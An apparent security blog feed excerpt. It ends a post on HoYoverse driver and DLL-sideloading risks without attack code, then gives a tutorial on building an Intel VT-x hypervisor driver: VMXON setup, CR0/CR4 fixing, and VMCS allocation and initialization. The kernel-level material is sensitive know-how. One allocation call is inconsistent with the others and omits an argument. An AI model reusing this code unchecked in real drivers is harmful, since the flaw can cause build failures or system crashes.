<li><p><code>LOAD_LIBRARY_SAFE_CURRENT_DIRS</code>: Allows loading a DLL from the current directory only if it is under a directory in the Safe load list.</p>
</li>
</ul>
<p>These flags allow developers to specify exact search locations for DLLs. They can also enhance security by requiring digital signatures.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>Honestly, <a target="_blank" href="https://www.loldrivers.io/">vulnerable drivers</a> aren't rare and neither are <a target="_blank" href="https://mansk1es.gitbook.io/edr-binary-abuse">DLL sideload attacks</a>. This is not to say that HoYoverse is incompetent, but perhaps more of an illustration of how big they have gotten as a cultural centerpiece. Which is a good thing.</p>
<p>The number of threat actors leveraging HoYoverse tools and infrastructure will definitely grow, as the game is frequented by younger folks who are in prime internship age. Usually companies mandate interns to bring their own devices to work, and these devices can log into SSO systems and internal networks without being covered by an EDR solution, making them a good soft target for threat actors.</p>
<p>Its infrastructure has also been somewhat of an interesting specimen, especially with a recent report from Kaspersky's GReAT stating that <a target="_blank" href="https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/">a threat actor has been targeting users</a> of DingTalk and WeChat Enterprise with malware that was downloaded from MiHoYo servers.</p>
<p>Personally I'm excited for what's next, I'm all for commissioning more art of gacha women for my blogpost that's for sure.</p>
]]></content:encoded></item><item><title><![CDATA[The Basics of Intel VT-x Extensions]]></title><description><![CDATA[Cover Illustration by t0meku

Traditionally, x86 processors lacked built-in virtualization support, leading to significant challenges when implementing efficient Virtual Machine Monitors (VMMs) or hypervisors.
But then Intel made Intel VT as a hardwa...]]></description><link>https://research.meekolab.com/the-basics-of-intel-vt-x-extensions</link><guid isPermaLink="true">https://research.meekolab.com/the-basics-of-intel-vt-x-extensions</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Tue, 27 Aug 2024 16:21:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1724775614186/fe6ad170-4f0c-4587-97cf-4c08937932cf.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by t0meku</em></strong></p>
</blockquote>
<p>Traditionally, x86 processors lacked built-in virtualization support, leading to significant challenges when implementing efficient Virtual Machine Monitors (VMMs) or hypervisors.</p>
<p>But then Intel introduced Intel VT as a hardware-based solution for virtualization acceleration. With VT-x, Intel aimed to reduce hypervisor complexity by offloading certain virtualization tasks to hardware, which allows for the development of simpler, more reliable VMMs.</p>
<p>This hardware solution also improves separation between different virtual machines and between virtual machines and the VMM, crucial for security and stability in multi-tenant environments.</p>
<p>In this article, I'll be developing a hypervisor using Intel's VT-x virtualization technology because i got bored i guess idk and i tried reading the <a target="_blank" href="https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html">Intel Architecture SDM documentation</a>. But i must say i wasn't strong enough to thug it all out, so some parts of this article are also based on <a target="_blank" href="https://rayanfam.com/topics/hypervisor-from-scratch-part-1/">Sina Karvandi's tutorial on how to build a Hypervisor from scratch</a> with Intel VT.</p>
<h1 id="heading-verify-cpu-support-for-vt-x">Verify CPU support for VT-x</h1>
<p>The VMM (Virtual Machine Monitor) startup process is described in detail in Section 31.5 of the <a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf">Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3C: System Programming Guide, Part 3</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722109042825/144bb8d8-9b4d-4bb9-a2f8-81950ec4dbba.png" alt class="image--center mx-auto" /></p>
<p>But to enable and initialize virtualization technology (VT) on a CPU, we must first verify VT support using the <code>CPUID</code> instruction and specific MSRs. Next, allocate 4KB-aligned non-paged memory for the vmxon area, with the size specified in the <code>IA32_VMX_BASIC</code> register.</p>
<p>Then we initialize the vmxon area by setting its version number, obtained from the lower 4 bytes of <code>IA32_VMX_BASIC</code> (typically 1). Then, configure <code>cr0</code> and <code>cr4</code> registers according to the requirements set by <code>IA32_VMX_CR0_FIXED0</code>, <code>IA32_VMX_CR0_FIXED1</code>, <code>IA32_VMX_CR4_FIXED0</code>, and <code>IA32_VMX_CR4_FIXED1</code> registers.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722270276809/766fcd98-5d73-4a4a-9ad2-774dd223c4e2.png" alt class="image--center mx-auto" /></p>
<p>We then need to ensure the <code>IA32_FEATURE_CONTROL</code> register is correctly set, with bits 0 and 2 both set to 1. This can be verified by reading the register, performing a bitwise AND with 5, and checking that the result equals 5. Finally, execute the <code>VMXON</code> instruction, passing a pointer to the physical address of the vmxon area. The instruction's success is indicated by <code>rflags.cf=0</code>, while failure results in <code>rflags.cf=1</code>.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Check if BIOS has enabled VT</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxIsCheckSupportVTBIOS</span><span class="hljs-params">(VOID)</span>
</span>{
    ULONG64 value = __readmsr(IA32_FEATURE_CONTROL);
    <span class="hljs-keyword">return</span> (value &amp; <span class="hljs-number">0x5</span>) == <span class="hljs-number">0x5</span>;
}

<span class="hljs-comment">// Check if CPU supports VT</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxIsCheckSupportVTCPUID</span><span class="hljs-params">(VOID)</span>
</span>{
    <span class="hljs-keyword">int</span> cpuidInfo[<span class="hljs-number">4</span>];
    __cpuidex(cpuidInfo, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);
    <span class="hljs-comment">// CPUID ECX.VMX[bit 5] = 1 if VT is supported</span>
    <span class="hljs-keyword">return</span> (cpuidInfo[<span class="hljs-number">2</span>] &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">5</span>)) != <span class="hljs-number">0</span>;
}

<span class="hljs-comment">// Check if VT is enabled in CR4</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxIsCheckSupportVTCr4</span><span class="hljs-params">(VOID)</span>
</span>{
    ULONG64 cr4 = __readcr4();
    <span class="hljs-comment">// CR4.VMXE[bit 13] = 1 if VT is enabled</span>
    <span class="hljs-keyword">return</span> (cr4 &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">13</span>)) != <span class="hljs-number">0</span>;
}

<span class="hljs-function">VOID <span class="hljs-title">CheckVT</span><span class="hljs-params">(VOID)</span>
</span>{
    KIRQL oldIrql;
    PROCESSOR_NUMBER procNumber;
    KeGetCurrentProcessorNumberEx(&amp;procNumber);
    oldIrql = KeRaiseIrqlToDpcLevel();

    <span class="hljs-keyword">if</span> (VmxIsCheckSupportVTCPUID())
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
            <span class="hljs-string">"[INFO]: CPU supports VT (Processor %u:%u)\n"</span>,
            procNumber.Group, procNumber.Number);
    }
    <span class="hljs-keyword">if</span> (VmxIsCheckSupportVTBIOS())
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
            <span class="hljs-string">"[INFO]: BIOS has enabled VT (Processor %u:%u)\n"</span>,
            procNumber.Group, procNumber.Number);
    }
    <span class="hljs-keyword">if</span> (VmxIsCheckSupportVTCr4())
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
            <span class="hljs-string">"[INFO]: VT is enabled in CR4 (Processor %u:%u)\n"</span>,
            procNumber.Group, procNumber.Number);
    }

    KeLowerIrql(oldIrql);
}
</code></pre>
<h1 id="heading-vmxon-execution">VMXON Execution</h1>
<p>Next we're gonna need to start with VMXON Execution, which transitions the logical processor from normal operation into VMX root operation. We first need to allocate a 4KB-aligned, non-paged memory block for the VMXON region. This alignment is crucial for the proper functioning of virtualization features, and non-paged memory ensures that the VMXON region is always accessible and not swapped out to disk.</p>
<p>To allocate this memory, you typically use a function like <code>MmAllocateContiguousMemorySpecifyCache</code>. This function allows you to specify the size of the allocation (which should be <code>PAGE_SIZE</code>, or 4KB), as well as the physical address range within which the allocation should occur.</p>
<pre><code class="lang-c">PHYSICAL_ADDRESS lowPhys, highPhys;
lowPhys.QuadPart = <span class="hljs-number">0</span>;
highPhys.QuadPart = <span class="hljs-number">-1</span>;
pVcpu-&gt;VmxOnRegion = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE, lowPhys, highPhys, MmCached);
<span class="hljs-keyword">if</span> (!pVcpu-&gt;VmxOnRegion)
{
    <span class="hljs-comment">// Handle allocation failure</span>
    <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
}

pVcpu-&gt;VmxOnRegionPhys = MmGetPhysicalAddress(pVcpu-&gt;VmxOnRegion);
</code></pre>
<p>We can set the lower bound of the physical address to 0 and the upper bound to -1 (which effectively means the highest possible address), allowing the system to allocate the memory anywhere in physical memory that meets our requirements.</p>
<p>Once the memory is allocated, it needs to be properly initialized. This process is described in detail in section 25.11.5 of the Intel Software Developer's Manual. The VMXON region is a block of memory that the logical processor uses to support VMX operation.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722109287543/7af1347f-6525-42be-ba03-809bf946b121.png" alt class="image--center mx-auto" /></p>
<p>After allocating the memory, you need to use a function like <code>RtlZeroMemory</code> to clear the entire region. This step is crucial to prevent any potential issues caused by leftover data in the memory pages. All bits in this region should be set to zero, with one important exception: the first four bytes of the <code>VMXON</code> region.</p>
<p>The first four bytes of the <code>VMXON</code> region must be filled with the <code>VMX</code> revision identifier. This identifier is stored in the <code>IA32_VMX_BASIC</code> Model Specific Register (MSR). You can read this MSR and use its lower 32 bits as the revision identifier.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722109445427/c61e3a29-20da-45b2-be25-74c1af03b648.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-c">ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
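<span class="hljs-comment">// Bits 30:0 hold the revision identifier; bit 31 must stay clear</span>
*(PULONG)pVcpu-&gt;VmxOnRegion = (ULONG)(vmxBasic &amp; <span class="hljs-number">0x7FFFFFFF</span>);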
</code></pre>
<p>It's worth noting that the lower 4 bytes of this register typically contain the value 1. However, this may change in future CPU versions, so it's always best to read the actual value from the MSR rather than hardcoding it.</p>
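<p>To make the field layout concrete, here is a small sketch that decodes a raw <code>IA32_VMX_BASIC</code> value in portable C, assuming the layout given in the Intel SDM: bits 30:0 carry the revision identifier and bits 44:32 carry the region size in bytes. The helper names are invented for the example, and in a driver the input would come from <code>__readmsr(IA32_VMX_BASIC)</code> instead of a constant.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Bits 30:0 of IA32_VMX_BASIC hold the VMCS revision identifier. */
static uint32_t vmx_basic_revision_id(uint64_t vmx_basic)
{
    return (uint32_t)(vmx_basic &amp; 0x7FFFFFFFu);
}

/* Bits 44:32 report how many bytes the VMXON region (and each VMCS) needs. */
static uint32_t vmx_basic_region_size(uint64_t vmx_basic)
{
    return (uint32_t)((vmx_basic &gt;&gt; 32) &amp; 0x1FFFu);
}

/* Store the revision identifier in the first four bytes of a zeroed region. */
static void vmxon_region_set_revision(void *region, uint64_t vmx_basic)
{
    uint32_t revision = vmx_basic_revision_id(vmx_basic);
    memcpy(region, &amp;revision, sizeof(revision));
}
</code></pre>
<p>For a made-up MSR value of <code>0x0000100000000004</code>, these helpers yield a revision identifier of 4 and a region size of 4096 bytes.</p>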
<p>The VMXON region has several important requirements that must be met:</p>
<ol>
<li><p>It must be 4KB aligned, which we ensured during the memory allocation step.</p>
</li>
<li><p>Its physical address should not set any bits beyond the processor's physical address width. This is typically not an issue if you're using the allocation method described above.</p>
</li>
<li><p>The first 4 bytes should contain the VMCS revision identifier, which we set using the code above.</p>
</li>
</ol>
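<p>The first two requirements can be expressed as a quick sanity check on the physical address before it is handed to <code>VMXON</code>. This is only a sketch in portable C: <code>vmxon_pointer_is_valid</code> is a hypothetical helper, and the physical address width is passed in as a parameter (on real hardware it is reported in <code>CPUID.80000008H:EAX[7:0]</code>).</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* True when phys_addr is 4 KB aligned and fits in phys_addr_bits bits. */
static bool vmxon_pointer_is_valid(uint64_t phys_addr, unsigned phys_addr_bits)
{
    if ((phys_addr &amp; 0xFFFu) != 0) {
        return false;                           /* not 4 KB aligned */
    }
    if (phys_addr_bits &gt;= 64) {
        return true;                            /* every 64-bit value fits */
    }
    return (phys_addr &gt;&gt; phys_addr_bits) == 0;  /* no bits above the width */
}
</code></pre>
<p>In a driver, the value to check would be <code>pVcpu-&gt;VmxOnRegionPhys.QuadPart</code> from the allocation step.</p>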
<p>Before executing VMXON, we must configure the CR0 and CR4 control registers according to the requirements specified by four MSRs: <code>IA32_VMX_CR0_FIXED0</code>, <code>IA32_VMX_CR0_FIXED1</code>, <code>IA32_VMX_CR4_FIXED0</code>, and <code>IA32_VMX_CR4_FIXED1</code>.</p>
<p>For CR0, any bit that is set to 1 in <code>IA32_VMX_CR0_FIXED0</code> must be set to 1 and any bit that is set to 0 in <code>IA32_VMX_CR0_FIXED1</code> must be set to 0. Similarly, for CR4, any bit that is set to 1 in <code>IA32_VMX_CR4_FIXED0</code> must be set to 1 and any bit that is set to 0 in <code>IA32_VMX_CR4_FIXED1</code> must be set to 0. To implement these rules, you would typically read the current values of CR0 and CR4, read the values of the fixed MSRs, and then adjust CR0 and CR4 accordingly.</p>
<pre><code class="lang-c">ULONG64 cr0 = __readcr0();
ULONG64 cr4 = __readcr4();
ULONG64 cr0_fixed0 = __readmsr(IA32_VMX_CR0_FIXED0);
ULONG64 cr0_fixed1 = __readmsr(IA32_VMX_CR0_FIXED1);
ULONG64 cr4_fixed0 = __readmsr(IA32_VMX_CR4_FIXED0);
ULONG64 cr4_fixed1 = __readmsr(IA32_VMX_CR4_FIXED1);

cr0 = (cr0 | cr0_fixed0) &amp; cr0_fixed1;
cr4 = (cr4 | cr4_fixed0) &amp; cr4_fixed1;

__writecr0(cr0);
__writecr4(cr4);
</code></pre>
<p>This code ensures that all required bits are set in CR0 and CR4, and all bits that must be clear are cleared, while preserving the values of other bits that don't need to be changed. After completing all those steps, we are finally ready to execute the <code>VMXON</code> instruction.</p>
<pre><code class="lang-c"><span class="hljs-keyword">int</span> error = __vmx_on(&amp;pVmxonRegion-&gt;PhysicalAddress.QuadPart);
</code></pre>
<p>The <code>__vmx_on</code> function is a compiler intrinsic provided by MSVC (declared in <code>intrin.h</code>). It takes a pointer to a variable holding the physical address of the <code>VMXON</code> region we prepared earlier, and it returns 0 on success and a nonzero value on failure.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722270437591/cfe9f58b-c6fa-4283-8b03-a180be858c8e.png" alt class="image--center mx-auto" /></p>
<p>It's important to note that there are additional checks and requirements specified in the Intel manual, particularly in section 26.3.1.1.</p>
<ul>
<li><p>The <code>IA32_FEATURE_CONTROL</code> MSR must be properly configured to allow <code>VMXON</code> to execute. Specifically, bit 0 (the lock bit) must be set, and either bit 1 (enabling <code>VMXON</code> inside SMX operation) or bit 2 (enabling <code>VMXON</code> outside SMX operation) must be set, depending on your specific use case.</p>
</li>
<li><p>Bit 5 of CR4 (corresponding to Physical Address Extension) must be set to 1 for <code>VMXON</code> to succeed. The CR0 bits corresponding to Protected Mode (bit 0) and Paging (bit 31) must also be set to 1.</p>
</li>
<li><p>If you're operating in 64-bit mode, you need to ensure that the <code>IA32_EFER.LMA</code> bit is set to 1, indicating that the processor is in IA-32e mode.</p>
</li>
</ul>
<p>These additional checks and requirements ensure that the processor is in the correct state to begin VMX operation. Failing to meet any of these requirements will cause the VMXON instruction to fail, potentially with a #GP (General Protection) exception.</p>
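<p>The <code>IA32_FEATURE_CONTROL</code> requirement is easy to get wrong, so here is a minimal sketch of the check as a pure function. It assumes the bit layout from the Intel SDM (bit 0 lock, bit 1 VMX inside SMX, bit 2 VMX outside SMX); the macro and function names are hypothetical, and the MSR value is passed in rather than read with <code>__readmsr</code>.</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

#define FEATURE_CONTROL_LOCK            (1ULL &lt;&lt; 0)
#define FEATURE_CONTROL_VMX_INSIDE_SMX  (1ULL &lt;&lt; 1)
#define FEATURE_CONTROL_VMX_OUTSIDE_SMX (1ULL &lt;&lt; 2)

/* Returns true when the given MSR value permits VMXON in the current mode. */
static bool feature_control_allows_vmxon(uint64_t feature_control, bool in_smx)
{
    uint64_t enable = in_smx ? FEATURE_CONTROL_VMX_INSIDE_SMX
                             : FEATURE_CONTROL_VMX_OUTSIDE_SMX;

    if (!(feature_control &amp; FEATURE_CONTROL_LOCK))
        return false;            /* MSR not locked: VMXON faults */
    return (feature_control &amp; enable) != 0;
}
</code></pre>
<p>A typical firmware configuration for a driver running outside SMX is <code>0x5</code> (lock plus bit 2). If the lock bit is clear, a driver may set the enable and lock bits itself before attempting <code>VMXON</code>; once locked, the MSR cannot be changed until reset.</p>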
<h1 id="heading-allocating-vmcs-memory-and-vmclear-execution">Allocating VMCS Memory and VMCLEAR Execution</h1>
<p>After entering VMX operation mode, we then need to set up the Virtual Machine Control Structure (VMCS). The VMCS is a data structure in memory that controls the behavior of a virtual machine in Intel VT-x. It stores the guest state, host state, and control information for a virtual machine.</p>
<p>This process bears similarities to the allocation of the VMXON region, but it comes with its own set of specific requirements. The memory allocated for the VMCS must be 4KB aligned and non-paged, ensuring that it remains accessible at all times and isn't swapped out to disk. This alignment and memory type are crucial for the proper functioning of the virtualization features.</p>
<p>Once the memory is allocated, it needs to be initialized. The first 4 bytes of this newly allocated memory block play a special role. They must be filled with the lower 4 bytes of the <code>IA32_VMX_BASIC</code> Model Specific Register (MSR). This initialization step is critical as it sets up the VMCS with the correct version identifier, ensuring compatibility with the processor's VMX implementation.</p>
<p>The VMCS is a complex data structure that will eventually store a wide array of information about the virtual machine. This includes various registers, control areas, and even the vmexit control area. However, at this stage, we're only setting up the basic structure. The detailed configuration of these areas will come later, through the use of the <code>VMWRITE</code> instruction.</p>
<pre><code class="lang-c">PHYSICAL_ADDRESS lowPhys, highPhys;
lowPhys.QuadPart = <span class="hljs-number">0</span>;
highPhys.QuadPart = <span class="hljs-number">-1</span>;
pVcpu-&gt;VmcsRegion = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE, lowPhys, highPhys, lowPhys, MmCached); // lowPhys (0) doubles as BoundaryAddressMultiple
<span class="hljs-keyword">if</span> (!pVcpu-&gt;VmcsRegion)
{
    <span class="hljs-comment">// Handle allocation failure</span>
    <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
}

RtlZeroMemory(pVcpu-&gt;VmcsRegion, PAGE_SIZE);
pVcpu-&gt;VmcsRegionPhys = MmGetPhysicalAddress(pVcpu-&gt;VmcsRegion);

<span class="hljs-comment">// Initialize VMCS with revision identifier</span>
ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
*(PULONG)pVcpu-&gt;VmcsRegion = (ULONG)vmxBasic;
</code></pre>
<p>After allocating and performing the basic initialization of the VMCS memory, the next step in our process is to use the <code>VMCLEAR</code> instruction. <code>VMCLEAR</code> serves several important purposes in the setup of our virtual machine environment. First, it initializes the VMCS, setting its launch state to "clear". This is a necessary step before the VMCS can be used for a virtual machine. Second, <code>VMCLEAR</code> invalidates any cached VMCS data that the processor might be holding from previous uses of this VMCS. This ensures that we're starting with a clean slate. Finally, <code>VMCLEAR</code> ensures that all VMCS data is written to the VMCS region in memory, maintaining data consistency.</p>
<p>The <code>VMCLEAR</code> instruction is relatively simple to use. It takes a pointer to the physical address of the VMCS as its operand.</p>
<pre><code class="lang-c"><span class="hljs-keyword">int</span> error = __vmx_vmclear(&amp;pVcpu-&gt;VmcsRegionPhys.QuadPart);
<span class="hljs-keyword">if</span> (error)
{
    <span class="hljs-comment">// Handle VMCLEAR failure</span>
    <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
}
</code></pre>
<p>It's crucial to check the return value of <code>VMCLEAR</code>. If it fails, something has gone wrong in our VMX setup, and we should not proceed with further VMX operations using this VMCS. Only after it succeeds do we make this VMCS the current VMCS using the <code>VMPTRLD</code> instruction:</p>
<pre><code class="lang-c">error = __vmx_vmptrld(&amp;pVcpu-&gt;VmcsRegionPhys.QuadPart);
<span class="hljs-keyword">if</span> (error)
{
    <span class="hljs-comment">// Handle VMPTRLD failure</span>
    <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
}
</code></pre>
<p>This step is crucial because it makes the VMCS active and current, allowing us to use <code>VMREAD</code> and <code>VMWRITE</code> instructions to configure it in the subsequent steps.</p>
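<p>When logging failures from <code>__vmx_vmclear</code> or <code>__vmx_vmptrld</code>, it helps to distinguish the two failure codes the MSVC intrinsics return. The sketch below maps them to text; the enum and function names are hypothetical and only the numeric values 0, 1, and 2 come from the intrinsic documentation.</p>
<pre><code class="lang-c">/* Return codes documented for the MSVC __vmx_on, __vmx_vmclear and
 * __vmx_vmptrld intrinsics. */
enum {
    VMX_STATUS_OK           = 0,
    VMX_STATUS_FAIL_VALID   = 1,
    VMX_STATUS_FAIL_INVALID = 2
};

/* Turns an intrinsic return value into a message suitable for DbgPrintEx. */
static const char *vmx_status_text(unsigned char status)
{
    switch (status) {
    case VMX_STATUS_OK:
        return "success";
    case VMX_STATUS_FAIL_VALID:
        return "failed, error number in the VM-instruction error field";
    case VMX_STATUS_FAIL_INVALID:
        return "failed, no error number available";
    default:
        return "unexpected status";
    }
}
</code></pre>
<p>A return value of 1 means there is a current VMCS and its VM-instruction error field can be read with <code>VMREAD</code> for the precise cause; a return value of 2 means no such information exists.</p>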
<h1 id="heading-setup-vmcs">Setup VMCS</h1>
<p>As the VMCS acts as the interface between the hypervisor and VM, controlling how the virtual environment operates, we need to configure VMCS fields to determine the guest's perceived hardware state and set rules for VM exits and entries.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722135453816/bea25c60-edf5-4bff-8f6d-842c25eb1c0b.png" alt class="image--center mx-auto" /></p>
<p>Chapter 24.3 of the Intel white paper describes the fields in the VMCS control area in detail. As mentioned in the previous article, the VMCS fields that need to be set are:</p>
<ol>
<li><p>Guest-state fields. On VM exit, the processor saves the guest's state (registers and so on) into this area. On VM entry, the processor loads the guest's state from the corresponding fields here, so their values determine what the guest sees when it starts running.</p>
</li>
<li><p>Host-state fields. On VM exit, the host takes over the CPU, and the processor loads its registers from the values stored in this area. In other words, when a VM exit occurs, control returns from the guest to the host and execution continues at the RIP stored here.</p>
</li>
<li><p>VM-execution control fields</p>
</li>
<li><p>VM-exit control fields</p>
</li>
<li><p>VM-entry control fields</p>
</li>
</ol>
<p>In addition to these five areas, the VMCS has a VM-exit information area. It is read-only and records why a VM exit happened. It also holds the VM-instruction error field, which stores the error number after a VMX instruction fails.</p>
<p>Four values matter most when filling the guest and host areas: the RIP and RSP used on entering the guest, and the RIP and RSP used on returning to the host. We want the system to keep running normally after entering the guest, continuing from where it left off, so the guest RIP and RSP must be the return address and stack pointer of the function that called our initialization routine. For the host, every return from the guest is a VM exit that has to be handled, so the host RIP must point at the VM-exit handler. The host RSP must point at a freshly allocated region reserved for that handler. If the handler reused the guest's stack, it would overwrite the guest's stack contents and cause unpredictable results.</p>
<p>Before initializing the VMCS, we first obtain the guest RIP and RSP. Since the guest should continue from the code that was running before we entered it, we need the return address of the <code>VmxInit</code> function and the stack pointer its caller will have after the return. The guest then starts at that return address, using the caller's stack. To get these, we use the MSVC intrinsic <code>_AddressOfReturnAddress</code>, which returns a pointer to the stack slot holding the current function's return address. Dereferencing it gives the RIP we need. The caller's RSP is the address 8 bytes above that slot, which is where the stack pointer ends up once the return address has been popped. The code to obtain the guest RIP and RSP is therefore:</p>
<pre><code class="lang-c">PULONG64 retAddr = (PULONG64)_AddressOfReturnAddress();
ULONG64 guestEsp = (ULONG64)(retAddr + <span class="hljs-number">1</span>);
ULONG64 guestEip = *retAddr;
</code></pre>
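<p>The pointer arithmetic is easier to see on a fake stack. The following sketch is a plain user-mode illustration with hypothetical helper names; it assumes nothing beyond the x64 convention that <code>ret</code> pops one 8-byte slot.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* The value `ret` will load into RIP: the contents of the return-address slot. */
static uint64_t rip_after_return(const uint64_t *return_slot)
{
    return *return_slot;
}

/* The value RSP holds after `ret`: one 8-byte slot above the return address. */
static uint64_t rsp_after_return(const uint64_t *return_slot)
{
    return (uint64_t)(uintptr_t)(return_slot + 1);
}
</code></pre>
<p>Because <code>return_slot</code> is a pointer to a 64-bit value, adding 1 advances the address by 8 bytes, which is why the cast to an integer has to happen after the addition and not before it.</p>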
<p>The general framework of the <code>VmxInit</code> function is as follows. <code>hostEip</code> receives the address of the VM-exit handler; when a VM exit occurs, the processor jumps there so the event can be handled.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">VmxInit</span><span class="hljs-params">(ULONG64 hostEip)</span>
</span>{
    PVMXCPUPCB pVcpu = VmxGetCurrentCPUPCB();
    pVcpu-&gt;cpuNumber = KeGetCurrentProcessorNumberEx(<span class="hljs-literal">NULL</span>);

    PULONG64 retAddr = (PULONG64)_AddressOfReturnAddress();
    ULONG64 guestEsp = (ULONG64)(retAddr + <span class="hljs-number">1</span>);
    ULONG64 guestEip = *retAddr;

    <span class="hljs-keyword">int</span> error = VmxInitVmOn();
    <span class="hljs-keyword">if</span> (error)
    {
        DbgPrintEx(<span class="hljs-number">77</span>, <span class="hljs-number">0</span>, <span class="hljs-string">"[db]:vmon initialization failed error = %d, cpunumber %d\r\n"</span>, error, pVcpu-&gt;cpuNumber);
        <span class="hljs-keyword">return</span> error;
    }

    error = VmxInitVmcs(guestEip, guestEsp, hostEip);
    <span class="hljs-keyword">if</span> (error)
    {
        DbgPrintEx(<span class="hljs-number">77</span>, <span class="hljs-number">0</span>, <span class="hljs-string">"[db]:vmcs initialization failed error = %d, cpunumber %d\r\n"</span>, error, pVcpu-&gt;cpuNumber);
        VmxDestory();
        <span class="hljs-keyword">return</span> error;
    }

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Next, <code>VmxInitVmcs</code> sets up the VMCS fields. As with the VMXON region, we first allocate memory and write the revision identifier from <code>IA32_VMX_BASIC</code>. We then initialize the region with <code>vmclear</code> and select it with <code>vmptrld</code>. These two steps correspond to "unplugging the power" and "selecting the machine" from the previous article. After that comes the most involved part, filling in the VMCS fields. Here, each group of fields gets its own initialization function.</p>
<pre><code class="lang-c"><span class="hljs-comment">// VmxInitVmcs function</span>
<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">VmxInitVmcs</span><span class="hljs-params">(ULONG64 GuestEip, ULONG64 GuestEsp, ULONG64 hostEip)</span>
</span>{
    PVMXCPUPCB pVcpu = VmxGetCurrentCPUPCB();
    PHYSICAL_ADDRESS lowphys, heiPhy;
    lowphys.QuadPart = <span class="hljs-number">0</span>;
    heiPhy.QuadPart = <span class="hljs-number">-1</span>;

    pVcpu-&gt;VmxcsAddr = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE, lowphys, heiPhy, lowphys, MmCached);
    <span class="hljs-keyword">if</span> (!pVcpu-&gt;VmxcsAddr)
    {
        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;  <span class="hljs-comment">// Memory allocation failed</span>
    }

    <span class="hljs-built_in">memset</span>(pVcpu-&gt;VmxcsAddr, <span class="hljs-number">0</span>, PAGE_SIZE);
    pVcpu-&gt;VmxcsAddrPhys = MmGetPhysicalAddress(pVcpu-&gt;VmxcsAddr);

    pVcpu-&gt;VmxHostStackTop = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE * <span class="hljs-number">36</span>, lowphys, heiPhy, lowphys, MmCached);
    <span class="hljs-keyword">if</span> (!pVcpu-&gt;VmxHostStackTop)
    {
        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;  <span class="hljs-comment">// Memory allocation failed</span>
    }

    <span class="hljs-built_in">memset</span>(pVcpu-&gt;VmxHostStackTop, <span class="hljs-number">0</span>, PAGE_SIZE * <span class="hljs-number">36</span>);
    pVcpu-&gt;VmxHostStackBase = (ULONG64)pVcpu-&gt;VmxHostStackTop + PAGE_SIZE * <span class="hljs-number">36</span> - <span class="hljs-number">0x200</span>;

    <span class="hljs-comment">// Fill in ID</span>
    ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
    *(PULONG)pVcpu-&gt;VmxcsAddr = (ULONG)vmxBasic;

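    <span class="hljs-comment">// Clear the VMCS, then make it current; both intrinsics return nonzero on failure</span>
    <span class="hljs-keyword">if</span> (__vmx_vmclear(&amp;pVcpu-&gt;VmxcsAddrPhys.QuadPart) || __vmx_vmptrld(&amp;pVcpu-&gt;VmxcsAddrPhys.QuadPart))
    {
        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;
    }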

    VmxInitGuest(GuestEip, GuestEsp);
    VmxInitHost(hostEip);

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>For the guest-state fields, <code>GuestEip</code> and <code>GuestEsp</code> are passed in to determine where the guest starts running after VM entry. All other fields are filled in from the current processor state. The first things to fill in are the base, limit, access rights, and selector of each segment register, taken from the GDT.</p>
<p>Looking at the VMCS field encodings, the encodings for consecutive segment registers are adjacent and differ by 2. The way the base, limit, access rights, and selector are extracted is also the same for each segment register, so the logic can be wrapped in one function, here called <code>fillGdtDataItem</code>. The extraction follows the segment descriptor layout shown in the figure below. The details are not repeated here; reading the bit manipulation in the code carefully is recommended.</p>
